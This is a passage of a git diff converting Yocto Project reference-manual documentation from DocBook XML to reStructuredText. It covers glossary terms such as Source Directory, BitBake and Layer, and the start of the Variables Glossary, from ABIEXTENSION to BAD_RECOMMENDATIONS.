+     the Source Directory, if you do, the top-level directory name of the
+     Source Directory is derived from the Yocto Project release tarball.
+     For example, downloading and unpacking
+     :yocto_dl:`/releases/yocto/&DISTRO_REL_TAG;/&YOCTO_POKY;.tar.bz2`
+     results in a Source Directory whose root folder is named ``poky``.
+
+     It is important to understand the differences between the Source
+     Directory created by unpacking a released tarball as compared to
+     cloning ``git://git.yoctoproject.org/poky``. When you unpack a
+     tarball, you have an exact copy of the files based on the time of
+     release - a fixed release point. Any changes you make to your local
+     files in the Source Directory are on top of the release and will
+     remain local only. On the other hand, when you clone the ``poky`` Git
+     repository, you have an active development repository with access to
+     the upstream repository's branches and tags. In this case, any local
+     changes you make to the local Source Directory can be later applied
+     to active development branches of the upstream ``poky`` Git
+     repository.
+
+     For more information on concepts related to Git repositories,
+     branches, and tags, see the
+     ":ref:`overview-manual/overview-manual-development-environment:repositories, tags, and branches`"
+     section in the Yocto Project Overview and Concepts Manual.
+
+   :term:`Task`
+      A unit of execution for BitBake (e.g.
+      :ref:`ref-tasks-compile`,
+      :ref:`ref-tasks-fetch`,
+      :ref:`ref-tasks-patch`, and so forth).
+
+   :term:`Toaster`
+      A web interface to the Yocto Project's :term:`OpenEmbedded Build System`.
+      The interface enables you to
+      configure and run your builds. Information about builds is collected
+      and stored in a database. For information on Toaster, see the
+      :doc:`../toaster-manual/toaster-manual`.
+
+   :term:`Upstream`
+      A reference to source code or repositories that are not
+      local to the development system but located in a master area that is
+      controlled by the maintainer of the source code. For example, in
+      order for a developer to work on a particular piece of code, they
+      need to first get a copy of it from an "upstream" source.
diff --git a/documentation/ref-manual/ref-terms.xml b/documentation/ref-manual/ref-terms.xml
deleted file mode 100644
index 722fa7ee27..0000000000
--- a/documentation/ref-manual/ref-terms.xml
+++ /dev/null
@@ -1,524 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-terms'>
-<title>Yocto Project Terms</title>
-
-    <para>
-        Following is a list of terms and definitions users new to the Yocto
-        Project development environment might find helpful.
-        While some of these terms are universal, the list includes them
-        just in case:
-        <itemizedlist>
-            <listitem><para>
-                <emphasis>Append Files:</emphasis>
-                Files that append build information to a recipe file.
-                Append files are known as BitBake append files and
-                <filename>.bbappend</filename> files.
-                The OpenEmbedded build system expects every append file to have
-                a corresponding recipe (<filename>.bb</filename>) file.
-                Furthermore, the append file and corresponding recipe file
-                must use the same root filename.
-                The filenames can differ only in the file type suffix used
-                (e.g.
-                <filename>formfactor_0.0.bb</filename> and
-                <filename>formfactor_0.0.bbappend</filename>).</para>
-
-                <para>Information in append files extends or overrides the
-                information in the similarly-named recipe file.
-                For an example of an append file in use, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files in Your Layer</ulink>"
-                section in the Yocto Project Development Tasks Manual.</para>
-
-                <para>When you name an append file, you can use the
-                "<filename>%</filename>" wildcard character to allow for
-                matching recipe names.
-                For example, suppose you have an append file named as follows:
-                <literallayout class='monospaced'>
-     busybox_1.21.%.bbappend
-                </literallayout>
-                That append file would match any
-                <filename>busybox_1.21.</filename><replaceable>x</replaceable><filename>.bb</filename>
-                version of the recipe.
-                So, the append file would match any of the following recipe names:
-                <literallayout class='monospaced'>
-     busybox_1.21.1.bb
-     busybox_1.21.2.bb
-     busybox_1.21.3.bb
-     busybox_1.21.10.bb
-     busybox_1.21.25.bb
-                </literallayout>
-                <note><title>Important</title>
-                    The use of the "<filename>%</filename>" character
-                    is limited in that it only works directly in front of the
-                    <filename>.bbappend</filename> portion of the append file's
-                    name.
-                    You cannot use the wildcard character in any other
-                    location of the name.
-                </note>
-                </para></listitem>
-            <listitem><para id='bitbake-term'>
-                <emphasis>BitBake:</emphasis>
-                The task executor and scheduler used by the OpenEmbedded build
-                system to build images.
-                For more information on BitBake, see the
-                <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
-                </para></listitem>
-            <listitem><para id='board-support-package-bsp-term'>
-                <emphasis>Board Support Package (BSP):</emphasis>
-                A group of drivers, definitions, and other components that
-                provide support for a specific hardware configuration.
-                For more information on BSPs, see the
-                <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
-                </para></listitem>
-            <listitem>
-                <para id='build-directory'>
-                <emphasis>Build Directory:</emphasis>
-                This term refers to the area used by the OpenEmbedded build
-                system for builds.
-                The area is created when you <filename>source</filename> the
-                setup environment script that is found in the Source Directory
-                (i.e. <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>).
-                The
-                <link linkend='var-TOPDIR'><filename>TOPDIR</filename></link>
-                variable points to the Build Directory.</para>
-
-                <para>You have a lot of flexibility when creating the Build
-                Directory.
-                Following are some examples that show how to create the
-                directory.
-                The examples assume your
-                <link linkend='source-directory'>Source Directory</link> is
-                named <filename>poky</filename>:
-                <itemizedlist>
-                    <listitem><para>Create the Build Directory inside your
-                        Source Directory and let the name of the Build
-                        Directory default to <filename>build</filename>:
-                        <literallayout class='monospaced'>
-     $ cd $HOME/poky
-     $ source &OE_INIT_FILE;
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>Create the Build Directory inside your
-                        home directory and specifically name it
-                        <filename>test-builds</filename>:
-                        <literallayout class='monospaced'>
-     $ cd $HOME
-     $ source poky/&OE_INIT_FILE; test-builds
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        Provide a directory path and specifically name the
-                        Build Directory.
-                        Any intermediate folders in the pathname must exist.
-                        This next example creates a Build Directory named
-                        <filename>YP-&POKYVERSION;</filename>
-                        in your home directory within the existing
-                        directory <filename>mybuilds</filename>:
-                        <literallayout class='monospaced'>
-     $ cd $HOME
-     $ source $HOME/poky/&OE_INIT_FILE; $HOME/mybuilds/YP-&POKYVERSION;
-                        </literallayout>
-                        </para></listitem>
-                </itemizedlist>
-                <note>
-                    By default, the Build Directory contains
-                    <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>,
-                    which is a temporary directory the build system uses for
-                    its work.
-                    <filename>TMPDIR</filename> cannot be under NFS.
-                    Thus, by default, the Build Directory cannot be under NFS.
-                    However, if you need the Build Directory to be under NFS,
-                    you can set this up by setting <filename>TMPDIR</filename>
-                    in your <filename>local.conf</filename> file
-                    to use a local drive.
-                    Doing so effectively separates <filename>TMPDIR</filename>
-                    from <filename>TOPDIR</filename>, which is the Build
-                    Directory.
-                </note>
-                </para></listitem>
-            <listitem><para id='hardware-build-system-term'>
-                <emphasis>Build Host:</emphasis>
-                The system used to build images in a Yocto Project
-                Development environment.
-                The build system is sometimes referred to as the
-                <firstterm>development host</firstterm>.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Classes:</emphasis>
-                Files that provide for logic encapsulation and inheritance so
-                that commonly used patterns can be defined once and then
-                easily used in multiple recipes.
-                For reference information on the Yocto Project classes, see the
-                "<link linkend='ref-classes'>Classes</link>" chapter.
-                Class files end with the <filename>.bbclass</filename>
-                filename extension.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Configuration File:</emphasis>
-                Files that hold global definitions of variables,
-                user-defined variables, and hardware configuration
-                information.
-                These files tell the OpenEmbedded build system what to
-                build and what to put into the image to support a
-                particular platform.</para>
-
-                <para>Configuration files end with a <filename>.conf</filename>
-                filename extension.
-                The <filename>conf/local.conf</filename> configuration file in
-                the
-                <link linkend='build-directory'>Build Directory</link>
-                contains user-defined variables that affect every build.
-                The <filename>meta-poky/conf/distro/poky.conf</filename>
-                configuration file defines Yocto "distro" configuration
-                variables used only when building with this policy.
-                Machine configuration files, which
-                are located throughout the
-                <link linkend='source-directory'>Source Directory</link>, define
-                variables for specific hardware and are only used when building
-                for that target (e.g. the
-                <filename>machine/beaglebone.conf</filename> configuration
-                file defines variables for the Texas Instruments ARM Cortex-A8
-                development board).
-                </para></listitem>
-            <listitem><para id='term-container-layer'>
-                <emphasis>Container Layer:</emphasis>
-                Layers that hold other layers.
-                An example of a container layer is OpenEmbedded's
-                <ulink url='https://github.com/openembedded/meta-openembedded'><filename>meta-openembedded</filename></ulink>
-                layer.
-                The <filename>meta-openembedded</filename> layer contains
-                many <filename>meta-*</filename> layers.
-                </para></listitem>
-            <listitem><para id='cross-development-toolchain'>
-                <emphasis>Cross-Development Toolchain:</emphasis>
-                In general, a cross-development toolchain is a collection of
-                software development tools and utilities that run on one
-                architecture and allow you to develop software for a
-                different, or targeted, architecture.
-                These toolchains contain cross-compilers, linkers, and
-                debuggers that are specific to the target architecture.</para>
-
-                <para>The Yocto Project supports two different cross-development
-                toolchains:
-                <itemizedlist>
-                    <listitem><para>
-                        A toolchain only used by and within
-                        BitBake when building an image for a target
-                        architecture.
-                        </para></listitem>
-                    <listitem><para>A relocatable toolchain used outside of
-                        BitBake by developers when developing applications
-                        that will run on a targeted device.
-                        </para></listitem>
-                </itemizedlist></para>
-
-                <para>Creation of these toolchains is simple and automated.
-                For information on toolchain concepts as they apply to the
-                Yocto Project, see the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
-                section in the Yocto Project Overview and Concepts Manual.
-                You can also find more information on using the
-                relocatable toolchain in the
-                <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                manual.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Extensible Software Development Kit (eSDK):</emphasis>
-                A custom SDK for application developers.
-                This eSDK allows developers to incorporate their library
-                and programming changes back into the image to make
-                their code available to other application developers.</para>
-
-                <para>For information on the eSDK, see the
-                <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                manual.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Image:</emphasis>
-                An image is an artifact of the BitBake build process given
-                a collection of recipes and related Metadata.
-                Images are the binary output that run on specific hardware or
-                QEMU and are used for specific use-cases.
-                For a list of the supported image types that the Yocto Project
-                provides, see the
-                "<link linkend='ref-images'>Images</link>"
-                chapter.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Layer:</emphasis>
-                A collection of related recipes.
-                Layers allow you to consolidate related metadata to
-                customize your build.
-                Layers also isolate information used when building
-                for multiple architectures.
-                Layers are hierarchical in their ability to override
-                previous specifications.
-                You can include any number of available layers from the
-                Yocto Project and customize the build by adding your
-                layers after them.
-                You can search the Layer Index for layers used within
-                Yocto Project.</para>
-
-                <para>For introductory information on layers, see the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>The Yocto Project Layer Model</ulink>"
-                section in the Yocto Project Overview and Concepts Manual.
-                For more detailed information on layers, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                For a discussion specifically on BSP Layers, see the
-                "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP Layers</ulink>"
-                section in the Yocto Project Board Support Packages (BSP)
-                Developer's Guide.
-                </para></listitem>
-            <listitem><para id='metadata'>
-                <emphasis>Metadata:</emphasis>
-                A key element of the Yocto Project is the Metadata that
-                is used to construct a Linux distribution and is contained
-                in the files that the
-                <link linkend='build-system-term'>OpenEmbedded build system</link>
-                parses when building an image.
-                In general, Metadata includes recipes, configuration
-                files, and other information that refers to the build
-                instructions themselves, as well as the data used to
-                control what things get built and the effects of the
-                build.
-                Metadata also includes commands and data used to
-                indicate what versions of software are used, from
-                where they are obtained, and changes or additions to the
-                software itself (patches or auxiliary files) that
-                are used to fix bugs or customize the software for use
-                in a particular situation.
-                OpenEmbedded-Core is an important set of validated
-                metadata.</para>
-
-                <para>In the context of the kernel ("kernel Metadata"), the
-                term refers to the kernel config fragments and features
-                contained in the
-                <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/yocto-kernel-cache'><filename>yocto-kernel-cache</filename></ulink>
-                Git repository.
-                </para></listitem>
-            <listitem><para id='oe-core'>
-                <emphasis>OpenEmbedded-Core (OE-Core):</emphasis>
-                OE-Core is metadata comprised of foundational recipes,
-                classes, and associated files that are meant to be
-                common among many different OpenEmbedded-derived systems,
-                including the Yocto Project.
-                OE-Core is a curated subset of an original repository
-                developed by the OpenEmbedded community that has been
-                pared down into a smaller, core set of continuously
-                validated recipes.
-                The result is a tightly controlled and an quality-assured
-                core set of recipes.</para>
-
-                <para>You can see the Metadata in the
-                <filename>meta</filename> directory of the Yocto Project
-                <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi'>Source Repositories</ulink>.
-                </para></listitem>
-            <listitem><para id='build-system-term'>
-                <emphasis>OpenEmbedded Build System:</emphasis>
-                The build system specific to the Yocto Project.
-                The OpenEmbedded build system is based on another project known
-                as "Poky", which uses
-                <link linkend='bitbake-term'>BitBake</link> as the task
-                executor.
-                Throughout the Yocto Project documentation set, the
-                OpenEmbedded build system is sometimes referred to simply
-                as "the build system".
-                If other build systems, such as a host or target build system
-                are referenced, the documentation clearly states the
-                difference.
-                <note>
-                    For some historical information about Poky, see the
-                    <link linkend='poky'>Poky</link> term.
-                </note>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Package:</emphasis>
-                In the context of the Yocto Project, this term refers to a
-                recipe's packaged output produced by BitBake (i.e. a
-                "baked recipe").
-                A package is generally the compiled binaries produced from the
-                recipe's sources.
-                You "bake" something by running it through BitBake.</para>
-
-                <para>It is worth noting that the term "package" can,
-                in general, have subtle meanings.
-                For example, the packages referred to in the
-                "<link linkend='required-packages-for-the-build-host'>Required Packages for the Build Host</link>"
-                section are compiled binaries that, when installed, add
-                functionality to your Linux distribution.</para>
-
-                <para>Another point worth noting is that historically within
-                the Yocto Project, recipes were referred to as packages - thus,
-                the existence of several BitBake variables that are seemingly
-                mis-named,
-                (e.g. <link linkend='var-PR'><filename>PR</filename></link>,
-                <link linkend='var-PV'><filename>PV</filename></link>, and
-                <link linkend='var-PE'><filename>PE</filename></link>).
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Package Groups:</emphasis>
-                Arbitrary groups of software Recipes.
-                You use package groups to hold recipes that, when built,
-                usually accomplish a single task.
-                For example, a package group could contain the recipes for a
-                company’s proprietary or value-add software.
-                Or, the package group could contain the recipes that enable
-                graphics.
-                A package group is really just another recipe.
-                Because package group files are recipes, they end with the
-                <filename>.bb</filename> filename extension.
-                </para></listitem>
-            <listitem><para id='poky'>
-                <emphasis>Poky:</emphasis>
-                Poky, which is pronounced <emphasis>Pock</emphasis>-ee,
-                is a reference embedded distribution and a reference
-                test configuration.
-                Poky provides the following:
-                <itemizedlist>
-                    <listitem><para>
-                        A base-level functional distro used to illustrate
-                        how to customize a distribution.
-                        </para></listitem>
-                    <listitem><para>
-                        A means by which to test the Yocto Project
-                        components (i.e. Poky is used to validate
-                        the Yocto Project).
-                        </para></listitem>
-                    <listitem><para>
-                        A vehicle through which you can download
-                        the Yocto Project.
-                        </para></listitem>
-                </itemizedlist>
-                Poky is not a product level distro.
-                Rather, it is a good starting point for customization.
-                <note>
-                    Poky began as an open-source
-                    project initially developed by OpenedHand.
-                    OpenedHand developed Poky from the existing
-                    OpenEmbedded build system to create a commercially
-                    supportable build system for embedded Linux.
-                    After Intel Corporation acquired OpenedHand, the
-                    poky project became the basis for the Yocto Project's
-                    build system.
-                </note>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Recipe:</emphasis>
-                A set of instructions for building packages.
-                A recipe describes where you get source code, which patches
-                to apply, how to configure the source, how to compile it and so on.
-                Recipes also describe dependencies for libraries or for other
-                recipes.
-                Recipes represent the logical unit of execution, the software
-                to build, the images to build, and use the
-                <filename>.bb</filename> file extension.
-                </para></listitem>
-            <listitem><para id='reference-kit-term'>
-                <emphasis>Reference Kit:</emphasis>
-                A working example of a system, which includes a
-                <link linkend='board-support-package-bsp-term'>BSP</link>
-                as well as a
-                <link linkend='hardware-build-system-term'>build host</link>
-                and other components, that can work on specific hardware.
-                </para></listitem>
-            <listitem>
-                <para id='source-directory'>
-                <emphasis>Source Directory:</emphasis>
-                This term refers to the directory structure created as a result
-                of creating a local copy of the <filename>poky</filename> Git
-                repository <filename>git://git.yoctoproject.org/poky</filename>
-                or expanding a released <filename>poky</filename> tarball.
-                <note>
-                    Creating a local copy of the <filename>poky</filename>
-                    Git repository is the recommended method for setting up
-                    your Source Directory.
-                </note>
-                Sometimes you might hear the term "poky directory" used to refer
-                to this directory structure.
-                <note>
-                    The OpenEmbedded build system does not support file or
-                    directory names that contain spaces.
-                    Be sure that the Source Directory you use does not contain
-                    these types of names.
-                </note></para>
-
-                <para>The Source Directory contains BitBake, Documentation,
-                Metadata and other files that all support the Yocto Project.
-                Consequently, you must have the Source Directory in place on
-                your development system in order to do any development using
-                the Yocto Project.</para>
-
-                <para>When you create a local copy of the Git repository, you
-                can name the repository anything you like.
-                Throughout much of the documentation, "poky"
-                is used as the name of the top-level folder of the local copy of
-                the poky Git repository.
-                So, for example, cloning the <filename>poky</filename> Git
-                repository results in a local Git repository whose top-level
-                folder is also named "poky".</para>
-
-                <para>While it is not recommended that you use tarball expansion
-                to set up the Source Directory, if you do, the top-level
-                directory name of the Source Directory is derived from the
-                Yocto Project release tarball.
-                For example, downloading and unpacking
-                <filename>&YOCTO_POKY_TARBALL;</filename> results in a
-                Source Directory whose root folder is named
-                <filename>&YOCTO_POKY;</filename>.</para>
-
-                <para>It is important to understand the differences between the
-                Source Directory created by unpacking a released tarball as
-                compared to cloning
-                <filename>git://git.yoctoproject.org/poky</filename>.
-                When you unpack a tarball, you have an exact copy of the files
-                based on the time of release - a fixed release point.
-                Any changes you make to your local files in the Source Directory
-                are on top of the release and will remain local only.
-                On the other hand, when you clone the <filename>poky</filename>
-                Git repository, you have an active development repository with
-                access to the upstream repository's branches and tags.
-                In this case, any local changes you make to the local
-                Source Directory can be later applied to active development
-                branches of the upstream <filename>poky</filename> Git
-                repository.</para>
-
-                <para>For more information on concepts related to Git
-                repositories, branches, and tags, see the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#repositories-tags-and-branches'>Repositories, Tags, and Branches</ulink>"
-                section in the Yocto Project Overview and Concepts Manual.
-                </para></listitem>
-            <listitem><para><emphasis>Task:</emphasis>
-                A unit of execution for BitBake (e.g.
-                <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>,
-                <link linkend='ref-tasks-fetch'><filename>do_fetch</filename></link>,
-                <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>,
-                and so forth).
-                </para></listitem>
-            <listitem><para id='toaster-term'><emphasis>Toaster:</emphasis>
-                A web interface to the Yocto Project's
-                <link linkend='build-system-term'>OpenEmbedded Build System</link>.
-                The interface enables you to configure and run your builds.
-                Information about builds is collected and stored in a database.
-                For information on Toaster, see the
-                <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Upstream:</emphasis>
-                A reference to source code or repositories
-                that are not local to the development system but located in a
-                master area that is controlled by the maintainer of the source
-                code.
-                For example, in order for a developer to work on a particular
-                piece of code, they need to first get a copy of it from an
-                "upstream" source.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-variables.rst b/documentation/ref-manual/ref-variables.rst
new file mode 100644
index 0000000000..227c81fc39
--- /dev/null
+++ b/documentation/ref-manual/ref-variables.rst
@@ -0,0 +1,8801 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************
+Variables Glossary
+******************
+
+This chapter lists common variables used in the OpenEmbedded build
+system and gives an overview of their function and contents.
+
+:term:`A <ABIEXTENSION>` :term:`B` :term:`C <CACHE>`
+:term:`D` :term:`E <EFI_PROVIDER>` :term:`F <FEATURE_PACKAGES>`
+:term:`G <GCCPIE>` :term:`H <HOMEPAGE>` :term:`I <ICECC_DISABLED>`
+:term:`K <KARCH>` :term:`L <LABELS>` :term:`M <MACHINE>`
+:term:`N <NATIVELSBSTRING>` :term:`O <OBJCOPY>` :term:`P`
+:term:`R <RANLIB>` :term:`S` :term:`T`
+:term:`U <UBOOT_CONFIG>` :term:`V <VOLATILE_LOG_DIR>`
+:term:`W <WARN_QA>` :term:`X <XSERVER>`
+
+.. glossary::
+
+   :term:`ABIEXTENSION`
+      Extension to the Application Binary Interface (ABI) field of the GNU
+      canonical architecture name (e.g. "eabi").
+
+      ABI extensions are set in the machine include files. For example, the
+      ``meta/conf/machine/include/arm/arch-arm.inc`` file sets the
+      following extension:
+      ::
+
+         ABIEXTENSION = "eabi"
+
+   :term:`ALLOW_EMPTY`
+      Specifies whether to produce an output package even if it is empty.
+      By default, BitBake does not produce empty packages. This default
+      behavior can cause issues when there is an
+      :term:`RDEPENDS` or some other hard runtime
+      requirement on the existence of the package.
+
+      Like all package-controlling variables, you must always use them in
+      conjunction with a package name override, as in:
+      ::
+
+         ALLOW_EMPTY_${PN} = "1"
+         ALLOW_EMPTY_${PN}-dev = "1"
+         ALLOW_EMPTY_${PN}-staticdev = "1"
+
+   :term:`ALTERNATIVE`
+      Lists commands in a package that need an alternative binary naming
+      scheme. Sometimes the same command is provided in multiple packages.
+      When this occurs, the OpenEmbedded build system needs to use the
+      alternatives system to create a different binary naming scheme so the
+      commands can co-exist.
+
+      To use the variable, list out the package's commands that also exist
+      as part of another package. For example, if the ``busybox`` package
+      has four commands that also exist as part of another package, you
+      identify them as follows:
+      ::
+
+         ALTERNATIVE_busybox = "sh sed test bracket"
+
+      For more information on the alternatives system, see the
+      ":ref:`update-alternatives.bbclass <ref-classes-update-alternatives>`"
+      section.
+
+   :term:`ALTERNATIVE_LINK_NAME`
+      Used by the alternatives system to map duplicated commands to actual
+      locations. For example, if the ``bracket`` command provided by the
+      ``busybox`` package is duplicated through another package, you must
+      use the ``ALTERNATIVE_LINK_NAME`` variable to specify the actual
+      location:
+      ::
+
+         ALTERNATIVE_LINK_NAME[bracket] = "/usr/bin/["
+
+      In this example, the binary for the ``bracket`` command (i.e. ``[``)
+      from the ``busybox`` package resides in ``/usr/bin/``.
+
+      .. note::
+
+         If ``ALTERNATIVE_LINK_NAME`` is not defined, it defaults to ``${bindir}/name``.
+
+      For more information on the alternatives system, see the
+      ":ref:`update-alternatives.bbclass <ref-classes-update-alternatives>`"
+      section.
+
+   :term:`ALTERNATIVE_PRIORITY`
+      Used by the alternatives system to create default priorities for
+      duplicated commands. You can use the variable to create a single
+      default regardless of the command name or package, a default for
+      specific duplicated commands regardless of the package, or a default
+      for specific commands tied to particular packages. Here are the
+      available syntax forms:
+      ::
+
+         ALTERNATIVE_PRIORITY = "priority"
+         ALTERNATIVE_PRIORITY[name] = "priority"
+         ALTERNATIVE_PRIORITY_pkg[name] = "priority"
+
+      For more information on the alternatives system, see the
+      ":ref:`update-alternatives.bbclass <ref-classes-update-alternatives>`"
+      section.
+
+   :term:`ALTERNATIVE_TARGET`
+      Used by the alternatives system to create default link locations for
+      duplicated commands. You can use the variable to create a single
+      default location for all duplicated commands regardless of the
+      command name or package, a default for specific duplicated commands
+      regardless of the package, or a default for specific commands tied to
+      particular packages. Here are the available syntax forms:
+      ::
+
+         ALTERNATIVE_TARGET = "target"
+         ALTERNATIVE_TARGET[name] = "target"
+         ALTERNATIVE_TARGET_pkg[name] = "target"
+
+      .. note::
+
+         If ``ALTERNATIVE_TARGET`` is not defined, it inherits the value
+         from the :term:`ALTERNATIVE_LINK_NAME` variable.
+
+         If ``ALTERNATIVE_LINK_NAME`` and ``ALTERNATIVE_TARGET`` are the
+         same, the target for ``ALTERNATIVE_TARGET`` has "``.{BPN}``"
+         appended to it.
+
+         Finally, if the file referenced has not been renamed, the
+         alternatives system will rename it to avoid the need to rename
+         alternative files in the :ref:`ref-tasks-install`
+         task while retaining support for the command if necessary.
+
+      For more information on the alternatives system, see the
+      ":ref:`update-alternatives.bbclass <ref-classes-update-alternatives>`"
+      section.
+
+   :term:`ANY_OF_DISTRO_FEATURES`
+      When inheriting the
+      :ref:`features_check <ref-classes-features_check>`
+      class, this variable identifies a list of distribution features where
+      at least one must be enabled in the current configuration in order
+      for the OpenEmbedded build system to build the recipe. In other words,
+      if none of the features listed in ``ANY_OF_DISTRO_FEATURES``
+      appear in ``DISTRO_FEATURES`` within the current configuration, then
+      the recipe will be skipped, and if the build system attempts to build
+      the recipe then an error will be triggered.
+      
+
+   :term:`APPEND`
+      An override list of append strings for each target specified with
+      :term:`LABELS`.
+
+      See the :ref:`grub-efi <ref-classes-grub-efi>` class for more
+      information on how this variable is used.
+
+   :term:`AR`
+      The minimal command and arguments used to run ``ar``.
+
+   :term:`ARCHIVER_MODE`
+      When used with the :ref:`archiver <ref-classes-archiver>` class,
+      determines the type of information used to create a released archive.
+      You can use this variable to create archives of patched source,
+      original source, configured source, and so forth by employing the
+      following variable flags (varflags):
+      ::
+
+         ARCHIVER_MODE[src] = "original"                   # Uses original (unpacked) source files.
+         ARCHIVER_MODE[src] = "patched"                    # Uses patched source files. This is the default.
+         ARCHIVER_MODE[src] = "configured"                 # Uses configured source files.
+         ARCHIVER_MODE[diff] = "1"                         # Uses patches between do_unpack and do_patch.
+         ARCHIVER_MODE[diff-exclude] ?= "file file ..."    # Lists files and directories to exclude from diff.
+         ARCHIVER_MODE[dumpdata] = "1"                     # Uses environment data.
+         ARCHIVER_MODE[recipe] = "1"                       # Uses recipe and include files.
+         ARCHIVER_MODE[srpm] = "1"                         # Uses RPM package files.
+
+      For information on how the variable works, see the
+      ``meta/classes/archiver.bbclass`` file in the :term:`Source Directory`.
+
+   :term:`AS`
+      Minimal command and arguments needed to run the assembler.
+
+   :term:`ASSUME_PROVIDED`
+      Lists recipe names (:term:`PN` values) BitBake does not
+      attempt to build. Instead, BitBake assumes these recipes have already
+      been built.
+
+      In OpenEmbedded-Core, ``ASSUME_PROVIDED`` mostly specifies native
+      tools that should not be built. An example is ``git-native``, which
+      when specified, allows for the Git binary from the host to be used
+      rather than building ``git-native``.
+
+   :term:`ASSUME_SHLIBS`
+      Provides additional ``shlibs`` provider mapping information, which
+      adds to or overwrites the information provided automatically by the
+      system. Separate multiple entries using spaces.
+
+      As an example, use the following form to add an ``shlib`` provider of
+      shlibname in packagename with the optional version:
+      ::
+
+         shlibname:packagename[_version]
+
+      Here is an example that adds a shared library named ``libEGL.so.1``
+      as being provided by the ``libegl-implementation`` package:
+      ::
+
+         ASSUME_SHLIBS = "libEGL.so.1:libegl-implementation"
+
+   :term:`AUTHOR`
+      The email address used to contact the original author or authors in
+      order to send patches and forward bugs.
+
+   :term:`AUTO_LIBNAME_PKGS`
+      When the :ref:`debian <ref-classes-debian>` class is inherited,
+      which is the default behavior, ``AUTO_LIBNAME_PKGS`` specifies which
+      packages should be checked for libraries and renamed according to
+      Debian library package naming.
+
+      The default value is "${PACKAGES}", which causes the debian class to
+      act on all packages that are explicitly generated by the recipe.
+
+   :term:`AUTO_SYSLINUXMENU`
+      Enables creating an automatic menu for the syslinux bootloader. You
+      must set this variable in your recipe. The
+      :ref:`syslinux <ref-classes-syslinux>` class checks this variable.
+
+   :term:`AUTOREV`
+      When ``SRCREV`` is set to the value of this variable, it specifies to
+      use the latest source revision in the repository. Here is an example:
+      ::
+
+         SRCREV = "${AUTOREV}"
+
+      If you use the previous statement to retrieve the latest version of
+      software, you need to be sure :term:`PV` contains
+      ``${``\ :term:`SRCPV`\ ``}``. For example, suppose you
+      have a kernel recipe that inherits the
+      :ref:`kernel <ref-classes-kernel>` class and you use the previous
+      statement. In this example, ``${SRCPV}`` does not automatically get
+      into ``PV``. Consequently, you need to change ``PV`` in your recipe
+      so that it does contain ``${SRCPV}``.
+
+      For more information see the
+      ":ref:`dev-manual/dev-manual-common-tasks:automatically incrementing a package version number`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`AVAILABLE_LICENSES`
+      List of licenses found in the directories specified by
+      :term:`COMMON_LICENSE_DIR` and
+      :term:`LICENSE_PATH`.
+
+      .. note::
+
+         It is assumed that all changes to ``COMMON_LICENSE_DIR`` and
+         ``LICENSE_PATH`` have been done before ``AVAILABLE_LICENSES``
+         is defined (in :ref:`ref-classes-license`).
+
+   :term:`AVAILTUNES`
+      The list of defined CPU and Application Binary Interface (ABI)
+      tunings (i.e. "tunes") available for use by the OpenEmbedded build
+      system.
+
+      The list simply presents the tunes that are available. Not all tunes
+      may be compatible with a particular machine configuration, or with
+      each other in a
+      :ref:`Multilib <dev-manual/dev-manual-common-tasks:combining multiple versions of library files into one image>`
+      configuration.
+
+      To add a tune to the list, be sure to append it with spaces using the
+      "+=" BitBake operator. Do not simply replace the list by using the
+      "=" operator. See the
+      ":ref:`Basic Syntax <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:basic syntax>`" section in the BitBake
+      User Manual for more information.
+
+   :term:`B`
+      The directory within the :term:`Build Directory` in
+      which the OpenEmbedded build system places generated objects during a
+      recipe's build process. By default, this directory is the same as the
+      :term:`S` directory, which is defined as:
+      ::
+
+         S = "${WORKDIR}/${BP}"
+
+      You can separate the (``S``) directory and the directory pointed to
+      by the ``B`` variable. Most Autotools-based recipes support
+      separating these directories. The build system defaults to using
+      separate directories for ``gcc`` and some kernel recipes.
+
+   :term:`BAD_RECOMMENDATIONS`
+      Lists "recommended-only" packages to not install. Recommended-only
+      packages are packages installed only through the
+      :term:`RRECOMMENDS` variable. You can prevent any
+      of these "recommended" packages from being installed by listing them
